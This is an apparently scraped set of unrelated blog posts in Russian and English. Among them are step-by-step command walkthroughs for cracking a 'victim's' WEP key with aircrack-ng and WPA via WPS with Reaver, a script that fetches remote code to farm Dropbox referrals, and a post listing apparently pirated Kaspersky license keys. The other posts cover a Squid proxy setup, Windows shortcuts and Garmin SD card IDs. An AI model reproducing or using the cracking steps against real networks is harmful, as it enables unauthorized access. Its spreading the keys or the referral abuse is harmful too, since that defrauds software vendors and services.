Как взломать WEP кодировку за пару минут | WEP Crack Linux aircrack-ng
Как взломать WEP кодировку за пару минут используя Aircrack
Взлом советую проводить на ubuntu, хотя подойдет любой дистрибутив
Качаем и устанавливаем пакет Aircrack
Открываем консоль и пишем:
- sudo apt-get install aircrack-ng
С предложение продолжить мы соглашаемся, далее проверим как работает наша wi-fi карта, пишем в консоле:
- airmon-ng
- airmon-ng start wlan0
Дальше включаем мониторинг сетей:
- airodump-ng mon0
Нас пока интересуют сети с wep шифрованием, итак мы нашли жертву, пишем в консоле:
- airodump-ng -c 1 -w crack --bssid 11:11:11:11:11:11 mon0
-c 1 (сдесь мы ставим канал жертвы)
-w crack (название файла куда будет сохранятся наш мониторинг, я назвал его crack, вы как хотите))
--bssid (сдесь прописываем BSSID нашей жертвы, за пример я поставил 11:11:11:11:11)
- aireplay-ng -1 0 -a 11:11:11:11:11:11 mon0
После того как мы "перекинулись" парой слов с точкой надо наводнить ее пакетами (нужно немного подождать):
- aireplay-ng -3 -b 11:11:11:11:11:11 (-h 00:11:22:33:44:55) mon0
Ну вот процесс наводнения пошел, а мы с вами открываем третью консоль и пишем (Декодирование пароля):
- aircrack-ng -b 11:11:11:11:11:11 crack-01.cap
Ну вот и все у вас наберется достаточное кол-во пакетов, программа радостно крикнет KEY FOUND!!!
Скрипт прокачки рефералов Dropbox (до +16 Гб)
wget https://www.mylnikov.org/files/data/script-dropbox-mylnikov.tar && tar xvf script*.tar && cd dbhacking/
Ранее я пытался код старта вложить в скрипт - теперь не вижу в этом смысла потому что лучше его настраивать руками.
Приведен ниже:
sudo echo "deb http://archive.ubuntu.com/ubuntu/ jaunty main restricted" >> /etc/apt/sources.list
sudo apt-get update
sudo apt-get -y install xautomation epiphany-browser gtk2-engines-pixbuf
wget https://www.dropbox.com/download?dl=packages/ubuntu/dropbox_1.6.0_i386.deb
sudo dpkg -i *dropbox*
sudo apt-get -y remove network-manager network-manager-gnome
sudo sh -c "echo auto lo > /etc/network/interfaces"
sudo sh -c "echo iface lo inet loopback >> /etc/network/interfaces"
sudo sh -c "echo auto eth0 >> /etc/network/interfaces"
sudo sh -c "echo iface eth0 inet dhcp >> /etc/network/interfaces"
sudo /etc/init.d/networking restart
gconftool-2 set org.ghome.Epiphany user-agent "Chrome/17.0.963.12"
dropbox
echo "Copy next string to the terminal with your refferal"
echo "Turn on dropbox"
echo "Don't touch anything during script working. No mo than 10GB per day"
echo "link taken from https://www.dropbox.com/referrals"
echo """while [ 1 ]; do sh script db.tt/XXXXX; done"""
Ранее источник был актуален. В данный момент почти весь код я переписал.
Данный скрипт работает, однако у него есть очень много ограничений. В день можно прокачать только ограниченное количество аккаунтов. Точнее 20 прокачек.
Я разработал намного стабильный скрипт в котором вообще нет ограничений. Кому интересно, могу рассказать о реализации лично.
Данные предоставлены исключительно для образовательных целей.
How to crack WPA/WPA2-PSK with WPS. How to compile Reaver under Ubuntu 12.04 (and aircrack-ng)
How to crack WPA/WPA2-PSK with WPS
how-to compile and install Reaver under Ubuntu 12.04
Steps:
- download source
- install required libraries and tools
- download and build aircrack-ng
- compile and install
- run
Download Source
First you need to download the latest source from http://code.google.com/p/reaver-wps/
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
Extract the tarball
tar -xzvf reaver-1.4.tar.gz
Install Required Libraries and Tools
Before you can build Reaver you need pcaplib and later on aircrack-ng (iw) to run Reaver
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
Compile and Install
Build Reaver
cd reaver-1.4
cd src
./configure
make
Install Reaver
sudo make install
Download aircrack-ng source and build it
Ubuntu 12.04 aircrack-ng is not longer in the repository but you can still download it from source and compile it.
This is how to build aircrack-ng under Ubuntu 12.04
sudo apt-get install build-essential
sudo apt-get install libssl-dev
wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
Edit common.mak with vi as example
vi common.mak или gedit common.mak
Find the following row
CFLAGS ?= -g -W -Wall -Werror -O3
Remove “-Werror” so that it looks like this
CFLAGS ?= -g -W -Wall -O3
Save the file, build and install
make
sudo make install
Run
Reaver is now installed and ready to use. You will first need to put the wifi adapter info monitor mode before you can start and the most easiest way is to use airmon-ng (part of aircrack-ng) that you just installed.
First put your adapter info monitor mode, in my case it’s wlan0
sudo airmon-ng start wlan0
To run Reaver you must have to know BSSID.
You have to put this command to see all available wireless networks
sudo iwlist scanning
Maybe you will need to install iwlist. For it put the next line
sudo apt-get install iwlist
Run Reaver
sudo reaver -i mon0 -b 00:00:00:00:00:00
Replace MAC 00:00:00:00:00:00 with the actual AP:s MAC address to crack
How to Install a SQUID Proxy Server with SSL / User Authentication Tutorial
Today we will be installing the Squid proxy server, with a few modifications, including SSL support, as well as user / http authentication.
Now lets start of by installing the squid package:
Now the squid server should have automatically started, although if it hasn’t use:
The next step is to start the configuration, so we will start by editing Squid’s config file:
Now we need to define both the port and the IP address our server will be listening on, so locate the following line (and change as needed)
and / or
Bare in mind if your server is connected to the net, their are gonig to be two interfaces, both your external IP and internal, hence 127.0.0.1 and XX.XX.XX.XX
Port 3128 is the default port for Squid, although you might want to change this for security reasons.. ^_^
Now the last step is to define which IP’s / ranges are proxy server will accept connection from.
An example has been provide below, these values can be added in the “http_access allow” section of the configuration file:
An example has been provided below:
http_access allow our_networks
http_access allow 127.0.0.1
http_access allow all
This lets all devices on the main interface 192.168.1.0 / 24 range connect, as well as localhost and you can define any other range.
If you would like to deny any other connections from other nodes originating from different IP ranges add the following underneath:
That’s the core of the config completed, now its time to restart the server and check out the server!
Now we have a proxy server – which you is listening on XX.XX.XX.XX:3128.
Enter this information into your browser’s proxy config and test it out! Hopefully everything should go smoothley
Anonymous Server
—————-
Now if you would like an anonymous proxy server, please see the section below, if not, just skip the next session…
For anonymous server search for “header_access Authorization allow all” line in Squid’s config file and uncomment it and all “header_access” below it or use this config:
header_access Accept-Encoding allow all
header_access Accept-Language allow all
header_access Authorization allow all
header_access Cache-Control allow all
header_access Content-Disposition allow all
header_access Content-Encoding allow all
header_access Content-Length allow all
header_access Content-Location allow all
header_access Content-Range allow all
header_access Content-Type allow all
header_access Cookie allow all
header_access Expires allow all
header_access Host allow all
header_access If-Modified-Since allow all
header_access Location allow all
header_access Range allow all
header_access Referer allow all
header_access Set-Cookie allow all
header_access WWW-Authenticate allow all
header_access All deny all
All done
Caching Data
————
Now if we want squid to cache data we need to go into the configuration file again and uncomment this line:
This specifies where the cached data will be placed, how many MB’s of storage available (100), number of directories for data (16)
and number of subdirectories for data (256). You can specify this yourself, although I reccomend leaving them as they are unless you know what your doing.
User Authentication
——————-
we will make use of htpasswd / NCSA.
If you use lighttpd (like myself) please read the following:, although if you use apache please proceed to Step 2
As you might be aware lighttpd does not support .htpasswd functionality
etc/init.d/apache stop
This install htpasswd, you can get the binary from somewhere if you would like :/
STEP 2
——
Now we need to enter the following so htpasswd will create a password file for our proxy:
Make sure Squid can read the file correctly:
Now we need to access the NCSA helper, which I beleive is in “/usr/lib/squid/ncsa_auth” if memory serves me correctly.
If in doubt just type the following in the console:
Now we need to edit Squid’s config again and set a few variables:
So locate the following lines
auth_param basic children 5
auth_param basic realm Squid proxy-caching web server
auth_param basic credentialsttl 2 hours
auth_param basic casesensitive off
and uncomment them, with the above values ^^^
Now locate your ACL’s in the squid config and add the following lines:
http_access allow ncsa_users
Now save / close the file and then we restart Squid!
And test it out in your browser!
Setup the proxy XX.XX.XX.XX:3128
and when browsing yuo should be prompted for a username / password, enter it and your away!
SSL Encryption
————–
You now have an anonymous proxy that cache’s data Now I will be explaining how to encrypt all data from our server to our machine via the proxy.
In simple terms: The proxy (server) will fetch unencrypted data from a website, and then encrypt it and send it to us.
This is usefull if you don’t trust your ISP, or you are using a shared network etc.
Type:
type pass and conect via 3128
so ssh is making a tunell through ssh from the proxy, so its all encrypted!
Tip:
To actively monitor your squid server you can use the following command:
tail -f /var/log/squid/access.log
This is very usefull if your testing configurations
Сочетания клавиш c клавишей Windows
Сочетания клавиш — это комбинации двух или более клавиш, нажав которые можно выполнять задачи, обычно требующие применения мыши или другого указывающего устройства. Сочетания клавиш упрощают работу с компьютером, экономя время и силы при работе с Windows и другими программами. Клавиша Windows широко используется в операционных системах Windows для этих целей:
- Win — открыть/закрыть меню «Пуск»
- Win + B — выбрать первую иконку в области уведомлений, переключаться между иконками клавишами со стрелками
- Win + Ctrl + B — переключиться на программу, отображающую сообщение в области уведомлений
- Win + D — отображение рабочего стола.
- Win + E — открыть Проводник
- Win + F — открыть Поиск
- Win + Ctrl + F — открыть Поиск компьютеров
- Win + G — отобразить гаджеты поверх всех окон (только в Windows 7 и Windows Vista)
- Win + L — переключить между пользователями или заблокировать рабочую станцию
- Win + M — свернуть все окна
- Win + ⇧ Shift + M — восстановить окна после сворачивания
- Win + P — переключить режимы работы с внешним монитором/проектором (только компьютер, дублировать, расширить, только проектор) (только в Windows 7)
- Win + R — открыть диалог «Выполнить»
- Win + T — переключить фокус на панель задач (только в Windows 7)
- Win + U — открыть Центр специальных возможностей
- Win + X — открыть Центр мобильных приложений Windows (только для мобильных компьютеров в Windows Vistaи Windows 7)
- Win + Y — открыть Yahoo! Messenger (если установлен)
- Win + Pause — открыть свойства системы
- Win + Tab ⇆ — переключиться между кнопками окон на панели задач (в Windows Aero — переключиться между окнами, используя Windows Flip 3D)
- Win + Ctrl + Tab ⇆ — «залипание» Windows Flip 3D, переключиться между окнами клавишами со стрелками или колёсиком мыши (только в Windows Aero)
- Win + F1 — открыть Центр справки и поддержки Windows
- Win + 1 … 0 — запуск / переключение на программу, закрепленную на панели задач с указанным порядковым номером (только в Windows Vista и Windows 7)
- Win + ⇧ Shift + 1 … 0 — запуск нового экземпляра программы, закрепленной на панели задач с указанным порядковым номером (только в Windows 7)
- Win + Ctrl + 1 … 0 — переключение на последнее активное окно программы, закрепленной на панели задач с указанным порядковым номером (только в Windows 7)
- Win + Alt + 1 … 0 — открытие списка переходов для программы, закрепленной на панели задач с указанным порядковым номером (только в Windows 7)
- Win + ↑ — развернуть окно (только в Windows 7)
- Win + ↓ — восстановить/минимизировать окно (только в Windows 7)
- Win + ← или → — переключить режим развертывания окна (в том числе между мониторами в многомониторных конфигурациях) (только в Windows 7)
- Win + ⇧ Shift + ← или → — перенести окно между мониторами в многомониторных конфигурациях (только вWindows 7)
- Win + ⇧ Shift + ↑ или ↓ — растянуть активное окно от верхнего до нижнего краёв экрана / восстановить размер окна[3]
- Win + Home — свернуть/восстановить все несвёрнутые окна, кроме активного (только в Windows 7)
- Win + Space — взглянуть на рабочий стол (только в Windows 7)
- Win + Grey + — активировать экранную лупу / увеличить изображение на 100 % (только в Windows 7)
- Win + Grey - — при активной экранной лупе уменьшить изображение на 100 % (только в Windows 7)
- Win + ESC — отключить экранную лупу (только в Windows 7)
Сторонние разработки могут обеспечивать возможности назначения на клавишу Windows других действий.
11-3 задачник по физике.
Задачник по физике. Сылка ниже
ЕГЭ 2012 задачник
Внимание! Задачник в формате .DjVu скачать ридер для этого формата можно здесь.
Kaspersky Antivirus / Kaspersky Internet Security 2012-активация ключом.
Для активации Kaspersky Antivirus / Kaspersky Internet Security 2012 нужно сделать несколько не сложных действий
- Скачать файлы ключей (работающих) - Весь интернет "забит" ими
- Отключить Интернет на локальном компьютере
- Выбираете активацию касперского с помощью ключа
- Вводите один из этих ключей
- BR64D-DPWME-41E31-XDMY4
- 3G79H-74355-DBPC8-4VX4Y
- yy15f-tumv3-6rppk-2kv3q
- Далее выбираете активацию с помощью ключа
- Выбираете ключ из скачанных заранее.
- Успешно устанавливаете лицензию
- Ура. Всё получилось.
Внимание! Статья создана только для ознакомления.
Как узнать ID флеш-карточки?
Пока существует 2 варианта, через автомобильный навигатор и смартфон.
Что бы узнать ID Микро-SD в автомобильном навигаторе, Микро-SD необходимо вставить в контейнер SD.
Если у Вас только персональный навигатор есть, то значить надо у друзей попросить автомобильный или накройняк посетить магазин по продаже навигационного оборудования, и там попросить авто-навигатор.
Самый простор вариант узнать ID флешкарты (SD или микро SD в контейнере):
Включить автомобильный навигатор.
Войти в служебное меню навигатора GARMIN:
- На Nuvi 2хх-7хх надо нажать и удерживать экран (10…15сек) в углу на батарейке.
- На NUVI 660 надо нажать и удерживать на часах.
Далее перейти на страницу Data card test page и записать Serial.
Или более сложный вариант через смартфон:
1. Синхронизируешь покет с ПК
2. Запускаешь установку Garmin Mobile XT прямо с ПК, прогу лучше ставить на карточку, чтобы беречь память
3. Отрываешь Garmin Mobile XT на покете и узнаешь свой ID флешки в: Настройки/О системе (About).
Важно!
На флешке должна быть создана папка Garmin, в ней должен быть файл gmapsupp.img. Иначе ID флешки не покажет (покажет ID покета).
Если в руссифицированом варианте видны не все цыфры номера ID, то выберите английский язык в установках программы.